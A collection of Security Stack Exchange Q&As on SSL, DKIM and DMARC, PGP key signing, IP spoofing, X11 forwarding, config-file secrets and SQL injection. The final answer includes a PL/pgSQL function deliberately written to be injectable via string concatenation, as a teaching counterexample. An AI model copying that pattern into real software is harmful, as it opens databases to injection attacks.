14,334 | Let's say I have a web server I set up, and then a database server. However, they are communicating locally and are behind a firewall. In my opinion, no SSL is needed here, right? The only time to use SSL to encrypt the database connection would be between a web server that remotely communicates with a database server located somewhere else, right? I've seen guidelines for security before that advocate securing the database connection with SSL, but they were vague on when to use it. | It looks like the two previous answers to this question more or less strongly recommend turning on SSL anyway, but I'd like to suggest a different reasoning angle (although I'm not recommending not to turn on SSL). The two key points in assessing whether you need SSL or not are (a) what SSL protects you against and (b) what the threat model is: enumerate the potential threats. SSL/TLS protects the transport of information between a client (in this case, your web server) and a server (in this case, your database server) from tampering and eavesdropping by anyone on the network in between (including anyone able to get on those two machines). To assess whether SSL is useful, you need to assume that the attacker is in a position to perform the attack SSL is designed to protect you against. That is, the attacker would need to be in a position to sniff packets on the network or on either machine. If someone is in a position to sniff packets from the database server, they're likely to have root/admin access to that server. Using SSL/TLS at that stage will make no difference. If someone is in a position to sniff packets on the network between the web server and the database server (excluding those machines), using SSL/TLS will prevent them from seeing/altering the application content. If you think there might be a chance this is possible, do turn on SSL. A way to mitigate this would be to use two network cards on the web server: one to the outside world and one to the inside LAN where the DB server is (with no other machines, or in a way that you could treat them all as a single bigger machine). This network forming the overall web farm or cluster (whatever you want to call it) would be physically separated and only have one entry point from the outside: the web server itself (same principle for a reverse proxy head node). If someone is in a position to sniff packets on the head node (the web server) itself, they're likely to have root access there (processes run by non-root users on the machine shouldn't be able to read packets that are not for them). In this case, you would have a big problem anyway. What I doubt here is whether enabling SSL actually protects you much in this scenario. Someone with root access on the web server will be able to read your application configuration, including DB passwords, and should be able to connect to the DB server legitimately, even using SSL. In counterpart, if you did assume that this warrants the use of SSL (because it might be harder to look into what the processes actually do rather than just looking at the network, even if you have root control on the machine), this would mean you would also want to turn it on for localhost communications (e.g. if you have other services on your web server, or in the situation where both DB server and web server were on the same machine).
It's not necessarily a bad thing to be over-cautious, but you have to put your question in the context of what attackers could also do should they be in a position to perform an attack against what the security measure (SSL) protects you against, and whether this security measure would prevent them from achieving their goal anyway, once in this position. I think the window is actually quite narrow there (assuming your back-end network really is secured, physically, not just by some firewall amongst a number of machines). | {
"source": [
"https://security.stackexchange.com/questions/14334",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3537/"
]
} |
14,352 | Is it OK if I sign a subset of domain emails, or is this an all-or-nothing game? We use Amazon's Simple-Email-Service for sending e-commerce emails. We would like to sign these with DKIM . This same domain is also used for all email addresses for the corporation behind this e-commerce operation. Due to some IT constraints, it does not look like we'll be able to sign the employee emails for many months to come. Do spam protection servers look at the domain and see a DKIM public key and say, "OK, all emails must be signed", or do they look email-by-email and, if a signature is found, then they go looking for the public key? | DKIM doesn't tell you anything about whether a message is spam or not (although it's a bit more work to set up, there's plenty of spam that is signed with a valid DKIM signature). DKIM is all about identity - do I know that this message is from the specified sender (and that it hasn't been altered in any meaningful way)? No good anti-spam service will reject a message solely based on a lack of a DKIM signature. If there is an invalid signature, then that's something to consider (i.e. maybe this is phishing); however, it's risky to reject in this case (because signatures can get broken in transit), and most anti-spam filters will not do that (at least by default). The use of DKIM (without anything else) is to allow the mail client to indicate to the user that the message sender is verified (much as browsers indicate to the user that traffic is sent over SSL, or that a certificate is trusted). So, the simple answer is yes , it is useful to sign messages, even if you cannot sign them all. You can't tell your users that they should only trust messages that are signed, but they can at least trust some of them. (Unfortunately, not a lot of mail clients yet expose this information, and users aren't yet trained to look for it, so the benefits aren't large - yet). The simple answer to the second question is no , any decent spam filter will ignore the lack of a DKIM signature. Further to this, there are two ways you can extend your use of DKIM, that do have an impact when only some messages are signed. Author Domain Signing Practices (ADSP) is an optional extension to DKIM where you specify what should happen to unsigned messages. Specifically, you can select from three choices: unknown (this the behaviour you get if you don't use ADSP) - the domain signs some or all mail (or none, I suppose, although it would be then odd to have the record set up) all - the domain signs all mail. The recipient (or their anti-spam filter) gets to choose what to do with messages that don't have a valid signature; commonly these would be put into some sort of quarantine or flagged in some way so that the user is aware that they are probably fraudulent. discardable - the domain signs all mail, and is instructing the recipient (or their anti-spam filter) to silently discard any messages that don't have a valid signature. This is the same as "all", except that the sender , rather than the recipient , makes the decision about what to do with messages without a valid signature. Anti-spam (or anti-phishing, in this case) filters don't have to obey an ADSP instruction, but they are likely to. So right now, you should either ensure that you don't have an ADSP record, or that if you do it is set to "unknown". Once you are able to sign all messages, you could move to "all" or "discardable", depending on what behaviour you would like. 
Similar (but newer) to ADSP is Domain-based Message Authentication, Reporting & Conformance (DMARC). DMARC incorporates policies for both SPF failures and DKIM failures, and incorporates information about providing feedback (to the supposed sender domain) about failures. You've got basically the same choices as with ADSP, but more flexibility about how to work. The example the specification provides as to how you'd start using DKIM/SPF is roughly this: Deploy DKIM and SPF. Publish a DMARC policy of "none" with a feedback reporting address (this is like ADSP's "unknown", except that you also state that you want feedback about failures, so if they are really from you, you can figure out how to fix the problem). Tune your DKIM/SPF use until the feedback reports indicate that all your mail is appropriately authenticated. Increase the DMARC policy strength to "quarantine" for a small percentage (this instructs the receiver to quarantine any messages that don't meet the policy, but only for a randomly selected percentage of mail). Gradually increase the percentage (to 100%) as you get more confident that all mail is appropriately authenticated. Set a DMARC policy of "reject" (again with a small percentage to start with, building over time to 100%), so that rather than quarantining, messages that don't meet the policy are simply rejected. DMARC is new, so only a few anti-spam filters are using it at present, but that will (probably) increase over time, and there's little cost in adopting it now. If you choose to use DMARC, then right now you could get to step 2, and then continue through the steps as you manage to get all mail signed. | {
"source": [
"https://security.stackexchange.com/questions/14352",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9458/"
]
} |
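As a small illustration of the DMARC steps described in the answer above (an editorial sketch, not part of the original answer): the policy is published as a DNS TXT record at _dmarc.<domain>. The domain below is a placeholder, and the snippet assumes the third-party dnspython package (version 2 or later) is available.

# Minimal sketch: fetch a domain's published DMARC policy record.
# Assumes dnspython >= 2.0 is installed; the domain is a placeholder.
import dns.resolver

domain = "example.com"
try:
    answers = dns.resolver.resolve("_dmarc." + domain, "TXT")
    for rdata in answers:
        record = b"".join(rdata.strings).decode()
        # A gentle starting policy, as described above, looks roughly like:
        #   v=DMARC1; p=none; rua=mailto:dmarc-reports@example.com
        print(record)
except dns.resolver.NXDOMAIN:
    print("%s publishes no DMARC record" % domain)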
14,479 | What exactly does "key signing" mean? So for example I have a private/public GPG key pair so that people can send me encrypted e-mail, because they know my public key. But what does key signing mean in this example? E.g.: "a third person signs my public key (how?)." And most important: where can other people see that my key is signed by others? | OK, as you say, you have a private/public key pair so I can send you encrypted e-mail, because I know your public key. But how do I know your public key? Obviously, because you told me what it was, and if you told me over a secure channel - for example you wrote it on a piece of paper and handed it to me in private - then that's fine. But if you emailed it to me over an insecure channel, how can I know that Eve didn't intercept your email and replace your key with hers? Then Eve could read my encrypted email, because I'd have encrypted it with her key. This is a real problem, because if we've only got the Internet as our communications channel then by definition it's not secure to use for exchanging keys. It can't be, because we haven't exchanged keys yet. One way round this is to involve a third party whom we both trust. Let's call him Bob. Bob has a lot of secure channels to people. He has one to me and so I know his public key. He has one to you, and Bob knows your public key. What Bob can do is take your public key and sign the message "Lance's public key is 18348273847473436" with his private key. He then gives that signed message to you. Bob has signed your key. Now, if you want to send me your public key, you just send me the signed key over the insecure channel. I know it came from you, not Eve, because I can verify the signature with Bob's public key, and I trust Bob. So, we've turned the problem of "Graham and Lance need a secure channel between them" into the problem of "Graham needs a secure channel to Bob" and "Lance needs a secure channel to Bob". It doesn't sound like we've made things better, until you realise that now, instead of worrying about arranging secure channels to D.W. and Lucas and Schroeder and Thomas and Rory and Graham and everyone else on the Internet, you just need to worry about getting a secure channel to Bob, once. (A tiny code sketch of this signing step follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/14479",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2212/"
]
} |
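To make the "Bob signs Lance's key" step above concrete, here is a tiny editorial sketch using the third-party cryptography package: Bob signs a statement binding a name to a key, and anyone who already trusts Bob's public key can verify that binding. In real OpenPGP use the signing is done by GnuPG itself (for example with gpg --sign-key), and the signatures attached to a public key can be seen with gpg --list-signatures or in the key's listing on a key server, which addresses the last part of the question.

# Minimal sketch of the idea behind key signing: Bob signs a statement that binds Lance's
# name to Lance's public key; Graham, who trusts Bob, verifies it. Real PGP key signing
# is done by gpg itself; this only illustrates the sign/verify step.
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes

bob_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

statement = b"Lance's public key is 18348273847473436"
signature = bob_key.sign(statement, padding.PKCS1v15(), hashes.SHA256())

# Graham already knows Bob's public key and uses it to check the claim;
# verify() raises InvalidSignature if the statement or signature was tampered with.
bob_key.public_key().verify(signature, statement, padding.PKCS1v15(), hashes.SHA256())
print("Bob's signature over the statement verifies, so the key binding can be trusted.")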
14,505 | As far as I've understood, if you try to issue an HTTP request with a spoofed IP address, then the TCP handshake fails, so it's not possible to complete the HTTP request, because the SYN/ACK from the server doesn't reach the evil client... in most cases. But let's now mostly disregard these four cases: - Man in the middle (MITM) attacks - The case when the evil client controls the network of the Web server - The case when the evil client fakes another IP on its own local network - BGP attacks Then I can indeed trust the IP address of an HTTP request? Background: I'm thinking about building a map of IP addresses and resource usage, and blocking IP addresses that consume too many resources. But I'm wondering if there is, for example, some way to fake an infinite number of IP addresses (by issuing successful HTTP requests with faked IPs), so that the Web server's resource-usage-by-IP buffers grow huge and cause out-of-memory errors. (Hmm, perhaps an evil Internet router could fake very many requests. But they aren't evil, are they. (This would be a MITM attack? That's why I said mostly disregard, above)) | Yes (with your assumptions of neglecting the client being able to intercept the return of the handshake at a spoofed IP) if you do things correctly. HTTP requests are done over TCP; until the handshake is completed, the web server doesn't start processing the HTTP request. Granted, a random user could attempt to spoof the end of a handshake; but as they have to guess the server-generated ACK, they should only have a 1 in 2^32 (~4 billion) chance of doing it successfully each time. As Ladadadada commented, make sure you aren't picking up the wrong value of the remote IP address in your web application. You want the IP address from the IP datagram header (specifically, the source IP address). You do not want values like X-Forwarded-For / X-Real-IP that can be trivially forged, as they are set in the HTTP header. Definitely test by trying to spoof some IP addresses, with, say, a browser plugin or manually with telnet yourserver.com 80. The purpose of these fields is so web proxies (that may, say, cache content to serve it faster) can communicate to web servers the user's real IP address rather than the proxy's IP address (which may be shared by hundreds of users). However, since anyone can set this field, it should not be trusted. (A small sketch of per-address accounting keyed on the socket peer address follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/14505",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9487/"
]
} |
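As a sketch of the resource-accounting idea in the question and answer above (an editorial addition, not part of the original answer): key the counters on the address of the TCP connection the server actually completed a handshake with, and ignore client-supplied headers such as X-Forwarded-For unless they were set by your own trusted proxy. The limit value is arbitrary, and a real implementation would expire or bound the table to avoid the memory-growth worry raised in the question.

# Minimal sketch: count requests per client IP using the socket peer address,
# not spoofable headers like X-Forwarded-For. Standard library only.
from collections import Counter
from http.server import BaseHTTPRequestHandler, HTTPServer

LIMIT = 100          # arbitrary illustrative threshold
hits = Counter()     # a real server would expire/bound this table

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        ip = self.client_address[0]          # taken from the TCP connection, not from headers
        hits[ip] += 1
        if hits[ip] > LIMIT:
            self.send_error(429, "Too Many Requests")
            return
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok\n")

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), Handler).serve_forever()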
14,718 | I've created a new OpenPGP key to sign a software package in a source repository, with an expiration date three years from now. It seemed like a good security measure, because if the key is compromised or stolen the damage will be limited. But then I thought about the day when I will need to sign my new key. Signing the new key with the old key seems equivalent to keeping the old key, and thus adds nothing to security. Does setting an expiration date improve key security? If so, what's the best expiration/key replacement policy? | tl;dr: the expiry date is not a reasonable mechanism to protect the primary key, and you should have a revocation certificate at hand. The slightly longer version is that the effect of the expiration date differs between primary keys and subkeys, and also depends on what you aim to prevent. Subkeys For subkeys, the effect is rather simple: after a given time frame, the subkey will expire. This expiry date can only be changed using the primary key. If an attacker gets hold of your subkey (and only this), it will automatically be inactivated after the expiry date. The expiry date of a subkey is a great tool to announce that you switch your subkeys on a regular basis, and that it's time for others to update your key after a given time. Primary Keys For primary keys, the situation is different. If you have access to the private key, you can change the expiry date as you wish. This means that if an attacker gets access to your private key, he can extend the validity period arbitrarily. Worst case, you lose access to the private key at the same time; then even you cannot revoke the public key any more (you do have a printed or otherwise offline and safely stored revocation certificate, don't you?). An expiry date might help in the case where you just lose control over the key (while no attacker has control over it). The key will automatically expire after a given time, so there wouldn't be an unusable key with your name on it sitting forever on the key servers. Recovering Weak Unrevoked Keys Even worse, expiry dates might provide a false sense of security. The key on the key servers expired, so why bother to revoke it? There is a large number of well-connected 512-bit RSA keys on the key server network, and probably a comparably large number of weak DSA keys (because of the Debian RNG problems). With faster processors and possibly new knowledge of algorithm weaknesses, an attacker might in future be able to crack the expired but unrevoked key and use it! Keeping a Revocation Certificate Safe Instead If you've got a revocation certificate and are sure you will never lose access to both your private key and revocation certificate at the same time (consider fire, (physical) theft, official institutions searching your house), there is absolutely no use in setting an expiry date, apart from possible confusion and the extra work of extending it. | {
"source": [
"https://security.stackexchange.com/questions/14718",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7952/"
]
} |
14,731 | What is the difference between ECDHE-RSA and DHE-RSA? I know that DHE-RSA is (in one sentence) Diffie-Hellman signed using RSA keys, where DH is used for forward secrecy and RSA guards against MITM, but where exactly are the elliptic curves used in ECDHE-RSA? What upsides does ECDHE-RSA have over DHE-RSA? | ECDHE suites use elliptic-curve Diffie-Hellman key exchange, whereas DHE suites use ordinary Diffie-Hellman. The exchange is signed with RSA in the same way in both cases. The main advantage of ECDHE is that it is significantly faster than DHE. This blog article talks a bit about the performance of ECDHE vs. DHE in the context of SSL. | {
"source": [
"https://security.stackexchange.com/questions/14731",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3306/"
]
} |
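If you want to see which key exchange a given server actually negotiates, a short sketch with Python's standard ssl module is enough; the host name below is a placeholder, and the exact cipher name returned depends on the server and your OpenSSL build:
import socket
import ssl

host = "example.com"   # substitute the server you want to inspect
context = ssl.create_default_context()

with socket.create_connection((host, 443)) as raw_sock:
    with context.wrap_socket(raw_sock, server_hostname=host) as tls_sock:
        # cipher() returns (name, protocol, secret_bits),
        # e.g. ('ECDHE-RSA-AES128-GCM-SHA256', 'TLSv1.2', 128)
        print(tls_sock.cipher())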
14,794 | Can my email account be accessed without the password, and how secure is email if I store my personal documents on it? And how come Yahoo Mail asks me to tell them my friends and folders names to give it back to me after being stolen? | Typically, your email provider (Yahoo, for example) can read everything in your email without knowing your password. And they will, as required by law and potentially in other circumstances, provide copies to Law Enforcement and Government. It is also possible that an attacker could compromise Yahoo's servers and access your email that way. And an attacker might be able to get hold of your password in various ways, in which case the attacker can gain access to your email. Or, an attacker might be able to guess the answers to your security questions, which also is sufficient for the attacker to gain access to your email account. Lastly, it's important to mention that emails are not just documents on your email server; they're also on the email server of the person who sent it to you, and maybe cached on your client, and maybe on their client, and backed up in various places, and they travel over the network. Lots of copies mean lots of places where an attacker can get hold of a copy. (Your question hints that you might just be storing documents in email without sending them, in which case this is less of an issue.) Now, all this sounds very scary, but it's important in security to understand the level of risk and what your risk appetite is. Nothing is 100% secure - so you have to ask yourself:
- How valuable is this data to me? What will it cost me if there is a breach?
- What kind of attacker might try and get it? What resources and capabilities do they have? If the data is not very valuable, and anyone who is likely to want it is not very capable, then you don't need a lot of security. I'm not sure this is very practical, so here are some simple tips that will help you improve the security of your stored email: Choose a good password - not in a dictionary, not a name or a date, as long as possible, with a mixture of lowercase, uppercase, and symbols. Don't use that same password anywhere else; don't write it down or tell anyone, and use something random that isn't connected to you. Be careful about your answers to security questions, to make sure that no one will be able to guess them. If it looks like someone might be able to guess one of the answers to one of your security questions, you could consider lying (pick a random answer that will be unguessable), and write it down somewhere in case you ever need it. Consider encrypting the documents (with a different password to the one used for your email). There are lots of good tools for this: I like http://www.sophos.com/en-us/products/free-tools/sophos-free-encryption.aspx . Don't rely on built-in passwords in Word or WinZip; use a dedicated encryption tool. | {
"source": [
"https://security.stackexchange.com/questions/14794",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8780/"
]
} |
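To follow the "encrypt the documents before storing them" advice above, here is a rough sketch using the third-party Python cryptography package rather than the Sophos tool linked in the answer; the file names are placeholders:
from cryptography.fernet import Fernet

# Generate a key once and keep it somewhere safer than the mailbox itself.
key = Fernet.generate_key()
with open("document.key", "wb") as key_file:
    key_file.write(key)

fernet = Fernet(key)
with open("tax_records.pdf", "rb") as plaintext_file:
    ciphertext = fernet.encrypt(plaintext_file.read())

# Store or email the encrypted blob instead of the original document.
with open("tax_records.pdf.enc", "wb") as encrypted_file:
    encrypted_file.write(ciphertext)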
14,802 | Now that ICANN is allowing custom top-level domain names, and corporate IT workers often like to use .local as the TLD for internal networks, if someone does buy the .local TLD, what are some possible dangers a user could encounter? The main example I can think of is spear-phishing attacks. If a company has computers like SuperSecureServer.local on their LAN and a malicious attacker makes TotallyARealCorporateServer.local, would TotallyARealCorporateServer.local resolve to the attacker's IP? If it did, the attacker could send a bad link, then impersonate a real server and get domain login credentials. | To answer your specific question, .local has already been reserved by ICANN as an internal gTLD. Please see section 2.2.1.2.1 "Reserved Names" in the ICANN Applicant Guidebook. The full list of reserved gTLDs is: AFRINIC, ALAC, APNIC, ARIN, ASO, CCNSO, EXAMPLE*, GAC, GNSO, GTLD-SERVERS, IAB, IANA, IANA-SERVERS, ICANN, IESG, IETF, INTERNIC, INVALID, IRTF, ISTF, LACNIC, LOCAL, LOCALHOST, NIC, NRO, RFC-EDITOR, RIPE, ROOT-SERVERS, RSSAC, SSAC, TEST*, TLD, WHOIS, WWW.
*Note that in addition to the above strings, ICANN will reserve translations of the terms "test" and "example" in multiple languages. The remainder of the strings are reserved only in the form included above. (There is an addendum to the above to state that "similarity" metrics are applied to make sure that gTLDs like .1ocal are not abused, either.) | {
"source": [
"https://security.stackexchange.com/questions/14802",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2221/"
]
} |
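A small sketch of how an administrator might flag host names that use one of the reserved strings quoted above; the set below is typed in from that list (truncated here for brevity) rather than fetched from ICANN:
RESERVED_TLDS = {
    "local", "localhost", "invalid", "test", "example",
    "whois", "www", "tld", "nic",   # ...plus the rest of the reserved strings above
}

def uses_reserved_tld(hostname: str) -> bool:
    # Compare only the rightmost DNS label, case-insensitively.
    last_label = hostname.rstrip(".").rsplit(".", 1)[-1]
    return last_label.lower() in RESERVED_TLDS

print(uses_reserved_tld("SuperSecureServer.local"))   # True
print(uses_reserved_tld("example.com"))               # False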
14,815 | What are some of the security concerns and reasons either for or against allowing X11 forwarding? I have generally taken an approach of not allowing it under the blanket guise of security. Recently, I had a user indicate that they thought the security implications resulting from allowing X11-forwarded sessions were negligible. I was curious to learn more about what the harm is in allowing X11 forwarding and why one might want to allow it. | The implication of X11 forwarding is that it opens a channel from the server back to the client. In a simple SSH session, the client is more trusted than the server: anyone in control of the client can run commands on the server (assuming shell access), but the converse is not true. With X11 forwarding, the server is likely to gain shell access to the client. In a text session, there is a limited channel from the server back to the client: the server determines the output that is displayed on the client, and can in particular try to exploit escape sequences in the terminal running on the client. In an X11 session, the server can send X11 commands back to the client. X11 was not designed with security in mind; it was designed with the idea that all programs that you're displaying are run by you and hence trusted anyway. By default, SSH subjects commands from the server to restrictions through the X11 SECURITY extension. The SECURITY extension disables some obvious attacks such as keyboard grabs and key injection, but allows others like focus stealing. | {
"source": [
"https://security.stackexchange.com/questions/14815",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1937/"
]
} |
14,916 | I'm new to commercial SSL certificates and would like to know if a CSR that I generate is safe to send via email? | Sure but I don't think that the certificate authority should receive CSRs by email unless they are employing a mechanism (like signing your email with PGP/GPG) to ensure that the CSR came from you (rather than someone pretending to be you). | {
"source": [
"https://security.stackexchange.com/questions/14916",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9701/"
]
} |
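For context on why a CSR itself is not secret (the sensitive part is the private key, which never leaves your machine), here is a sketch using the third-party Python cryptography package; the subject name is a placeholder:
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID

# The private key stays on your server and is never part of the CSR.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

csr = (
    x509.CertificateSigningRequestBuilder()
    .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "www.example.com")]))
    .sign(private_key, hashes.SHA256())
)

# This PEM block (subject, public key, and signature) is what goes to the CA;
# signing the email that carries it, as the answer suggests, protects its authenticity.
print(csr.public_bytes(serialization.Encoding.PEM).decode())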
14,967 | I need to convince my internal IT department to give my new team of developers admin rights to our own PCs. They seem to think this will create some security risk to the network. Can anyone explain why this would be? What are the risks? What do IT departments usually set up for developers who need the ability to install software on their PCs? This question was IT Security Question of the Week. Read the June 8, 2012 blog entry for more details or submit your own Question of the Week. | At every place I have worked (as a contract developer), developers are given local admin rights on their desktops. The reasons are: 1) Developers' toolsets are often updated very regularly. Graphics libraries, code helpers, Visual Studio updates; they end up having updates coming out almost weekly that need to be installed. Desktop support usually gets very tired of getting 20 tickets every week to go install updated software on all the dev machines, so they just give the devs admin rights to do it themselves. 2) Debugging / testing tools sometimes need admin rights to be able to function. No admin access means developers can’t do their job of debugging code. Managers don't like that. 3) Developers tend to be more security-conscious and so are less likely to run/install dangerous malware. Obviously, it still happens, but all in all developers can usually be trusted to have higher-level access to be able to do their work. | {
"source": [
"https://security.stackexchange.com/questions/14967",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9734/"
]
} |
15,040 | My workplace has a standard that plaintext passwords are not allowed in application configuration files. This makes enough sense on its face: if someone gets access to the config files, they don't automatically have access to all the privileges of that application. In some cases it's possible and obviously preferable to have access associated with the login or otherwise avoid having a password, such as in Windows Security for SQL Server authentication, or to have it configured in a third-party location, such as JDBC configuration in a J2EE environment, but this is not always possible. When I must have a password in a configuration file, what level of encryption should it carry? How do you deal with the fact that the encryption key for the password has to be either hard coded or stored in yet another config file? Should the encryption keys for passwords be human-readable? | So the following was a bit too long for a comment... Perhaps taking one step back and comparing the benefits of preventative and detective controls might help. Preventative controls include encryption, but you could also encode the password to make it less obvious. This approach is meant to protect the password from accidental sharing (a b32 encoding would produce less meaningful characters; b32 produces a longer string than b64). Such an approach just increases the difficulty of memorizing the random sequence of characters as well as the method that should be used to decode the string. Base32/64 encoding is a simple way of protecting passwords that does not require additional logic to be built/maintained. The other approaches to preventative controls would likely use encryption. There are many different ways to protect the key. Without getting into the details or reiterating what D.W. already posted, you can layer detective controls to improve the security posture. For example, you can audit access to the file that contains the key. You can correlate events (such as restarting of a server/service) with access to the key file. Any other access request (successful or not) to the key file could indicate abnormal activity. To get to your questions, here's my take: if you have to store a password in a config file, I'd recommend at least encoding the password where possible. Encoding the password would reduce the chance that it's leaked in the event someone scrolls through the file, say with a vendor support rep watching. Encrypting the password is much safer, but that requires additional complexity. How do you deal with the fact that a key has to be hard coded or stored in another file? Well, separating the encryption key into another file increases the difficulty for someone to view the key. For example, you can use access control to limit access to the key file but still maintain a more open ACL for the config file. Similarly, you can implement auditing for access to the key file, which you can use to correlate back to events that require use of the key. Hard coding the key may be fine if you limit access to the binary, though an encoded password can still easily be spotted by running "strings" against the binary. You can encode/encrypt the hard-coded password (i.e. require a separate function, perhaps with auditing, to decode the password), but that increases the complexity for the developer and admin (i.e. how does one change the key without rebuilding/recompiling the binary?). Should the encryption keys for passwords be human-readable? It depends. There's only a limited number of ways to protect the key.
An encryption key is usually seen as an alphanumeric string that's hard to commit to memory. You can always encode/encrypt the key, but such methods don't deter someone who's smart enough to take a screenshot. However, you can use simple "keys" (more like passwords) as input to a key expansion function. In those instances, perhaps additional measures such as encoding add some additional value relative to the cost of complexity. If anything, a good approach is to implement multiple layers of controls. Preventative controls are more difficult, while detective controls are generally easier to implement. Separating key files could simplify the overall architecture and implementation of controls. Regardless of whether preventative or detective controls are used, enabling some auditing functions is a must, along with review of the audit logs. This way, should the improbable happen (access to the key), you can take corrective action. | {
"source": [
"https://security.stackexchange.com/questions/15040",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1678/"
]
} |
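To make the "keep the key in a separate, more tightly controlled file" idea concrete, here is a sketch with the third-party Python cryptography package; the paths, config layout, and use of a Fernet token are assumptions for illustration only:
from configparser import ConfigParser
from cryptography.fernet import Fernet

# The key file lives outside the config directory, with a restrictive ACL
# and (ideally) audit logging on every read.
with open("/etc/myapp/secret.key", "rb") as key_file:
    fernet = Fernet(key_file.read())

config = ConfigParser()
config.read("/etc/myapp/app.ini")

# The config file holds only the encrypted token, never the plaintext password.
encrypted_token = config["database"]["password_token"].encode()
db_password = fernet.decrypt(encrypted_token).decode()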
15,076 | I have found out recently that the remote assistant software that we put in a smartphone we sell can be activated by us without user approval. We are not using this option, and it is probably there by mistake. But the people who are responsible for this system don't see it as a big deal. Because “We are not going to use it”… Am I wrong for going ballistic over it? What would you do about it if it was your workplace? This question was IT Security Question of the Week . Read the Jun 16, 2012 blog entry for more details or submit your own Question of the Week. | Just because they won't use it, doesn't mean someone else won't find it and use it. A backdoor is a built-in vulnerability and can be used by anyone. You should explain that doing something like this is very risky for your company. What happens when some malicious attacker finds this backdoor and uses it? This will cost your company a lot of time and money to fix. And what will your company say when people ask why the software contained that backdoor in the first place? The company's reputation might be damaged forever. The risk is certainly not worth having it in the code. | {
"source": [
"https://security.stackexchange.com/questions/15076",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9811/"
]
} |
15,214 | Are prepared statements actually 100% safe against SQL injection, assuming all user-provided parameters are passed as query bound parameters? Whenever I see people using the old mysql_ functions on StackOverflow (which is, sadly, way too frequently) I generally tell people that prepared statements are the Chuck Norris (or Jon Skeet) of SQL injection security measures. However, I've never actually seen any documentation that categorically states "this is 100% safe". My understanding of them is that they separate the query language and parameters all the way to the front door of the server, which then treats them as separate entities. Am I correct in this assumption? | Guarantee of 100% safe from SQL injection? Not going to get it (from me). In principle, your database (or the library in your language that is interacting with the db) could implement prepared statements with bound parameters in an unsafe way susceptible to some sort of advanced attack, say exploiting buffer overflows or having null-terminating characters in user-provided strings, etc. (You could argue that these types of attacks should not be called SQL injection as they are fundamentally different; but that's just semantics.) I have never heard of any of these attacks on prepared statements on real databases in the field and strongly suggest using bound parameters to prevent SQL injection. Without bound parameters or input sanitization, it's trivial to do SQL injection. With only input sanitization, it's quite often possible to find an obscure loophole around the sanitization. With bound parameters, your SQL query execution plan is figured out ahead of time without relying on user input, which should make SQL injection not possible (as any inserted quotes, comment symbols, etc. are only inserted within the already compiled SQL statement). The only argument against using prepared statements is if you want your database to optimize your execution plans depending on the actual query. Most databases, when given the full query, are smart enough to pick an optimal execution plan; e.g., if the query returns a large percentage of the table, it would want to walk through the entire table to find matches, while if it's only going to return a few records it may do an index-based search [1]. EDIT: Responding to two criticisms (that are a tad too long for comments): First, as others noted, yes, every relational database supporting prepared statements and bound parameters doesn't necessarily pre-compile the prepared statement without looking at the values of the bound parameters. Many databases customarily do this, but it's also possible for databases to look at the values of the bound parameters when figuring out the execution plan. This isn't a problem, as the structure of the prepared statement with separated bound parameters makes it easy for the database to cleanly differentiate the SQL statement (including SQL keywords) from the data in bound parameters (where nothing in a bound parameter will be interpreted as an SQL keyword). This is not possible when constructing SQL statements from string concatenation, where variables and SQL keywords would get intermixed. Second, as the other answer points out, using bound parameters when calling an SQL statement at one point in a program will safely prevent SQL injection when making that top-level call.
However, if you have SQL injection vulnerabilities elsewhere in the application (e.g., in user-defined functions that you stored and run in your database and that you unsafely wrote to construct SQL queries by string concatenation), you are still vulnerable. For example, if in your application you wrote pseudo-code like: sql_stmt = "SELECT create_new_user(?, ?)"
params = (email_str, hashed_pw_str)
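# bound parameters: the statement text and the values are sent to the database separately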
db_conn.execute_with_params(sql_stmt, params) There can be no SQL injection when running this SQL statement at the application level. However, if the user-defined database function was written unsafely (using PL/pgSQL syntax): CREATE FUNCTION create_new_user(email_str text, hashed_pw_str text) RETURNS VOID AS
$$
DECLARE
sql_str TEXT;
BEGIN
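-- UNSAFE: the user-supplied values are concatenated directly into the SQL text built below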
sql_str := 'INSERT INTO users VALUES (' || email_str || ', ' || hashed_pw_str || ');';
EXECUTE sql_str;
END;
$$
LANGUAGE plpgsql; then you would be vulnerable to SQL injection attacks, because it executes an SQL statement constructed via string concatenation that mixes the SQL statement with strings containing the values of user-defined variables. That said, unless you were trying to be unsafe (constructing SQL statements via string concatenation), it would be more natural to write the user-defined function in a safe way like: CREATE FUNCTION create_new_user(email_str text, hashed_pw_str text) RETURNS VOID AS
$$
BEGIN
INSERT INTO users VALUES (email_str, hashed_pw_str);
END;
$$
LANGUAGE plpgsql; Further, if you really felt the need to compose an SQL statement from a string in a user-defined function, you can still separate data variables from the SQL statement in the same way as stored procedures/bound parameters even within a user-defined function. For example, in PL/pgSQL: CREATE FUNCTION create_new_user(email_str text, hashed_pw_str text) RETURNS VOID AS
$$
DECLARE
sql_str TEXT;
BEGIN
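-- Safe: the values are supplied separately via EXECUTE ... USING and never become part of the SQL string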
sql_str := 'INSERT INTO users VALUES($1, $2)';
EXECUTE sql_str USING email_str, hashed_pw_str;
END;
$$
LANGUAGE plpgsql; So using prepared statements is safe from SQL injection, as long as you aren't just doing unsafe things elsewhere (that is, constructing SQL statements by string concatenation). | {
"source": [
"https://security.stackexchange.com/questions/15214",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5400/"
]
} |
